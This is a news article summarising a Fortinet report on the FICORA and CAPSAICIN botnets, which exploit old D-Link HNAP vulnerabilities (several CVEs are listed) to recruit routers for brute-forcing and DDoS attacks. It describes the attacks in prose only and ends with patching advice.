Surge in Botnet Activity Targeting D-Link Routers
Researchers in cybersecurity are sounding alarms about a recent increase in malicious activities involving the enlistment of vulnerable D-Link routers into two distinct botnets: a variant of Mirai referred to as FICORA and a Kaiten variant known as CAPSAICIN.
Exploitation of HNAP Vulnerabilities
Vincent Li, a researcher from Fortinet FortiGuard Labs, noted in a Thursday analysis that these botnets commonly utilize known vulnerabilities in D-Link devices. Attackers exploit a flaw in the Home Network Administration Protocol (HNAP) interface, allowing them to execute harmful commands through a GetDeviceSettings request.
Historical Context of Security Flaws
The vulnerabilities exploited in these attacks have been recognized for nearly ten years, affecting a multitude of devices with various CVE numbers, such as CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112.
Global Reach of FICORA and CAPSAICIN Attacks
Fortinet’s telemetry data indicates that attacks involving FICORA have been globally widespread, whereas CAPSAICIN has predominantly targeted regions in East Asia, including Japan and Taiwan. Notably, CAPSAICIN activity experienced intense peaks on October 21 and 22, 2024.
Operational Mechanism of the Botnets
The FICORA botnet operates by executing a downloader shell script, which retrieves the main payload tailored for various Linux architectures using common protocols such as wget, ftpget, curl, and tftp. This malware incorporates a brute-force attack function with a predefined list of usernames and passwords designed to maximize its effectiveness.
CAPSAICIN’s Command Structure
The downloader script for CAPSAICIN uses a different IP address, mirroring FICORA’s approach to ensure compatibility across multiple Linux systems. Once infiltrated, CAPSAICIN awaits further directives to undertake various malicious operations, including command executions for information gathering and launching DDoS attacks against specified targets.
Importance of Ongoing Device Maintenance
Despite the vulnerabilities being publicly addressed and patched almost ten years ago, ongoing attacks utilizing these exploits continue globally. Li emphasized the necessity for enterprises to consistently update their devices’ software and implement robust monitoring practices to mitigate risks.
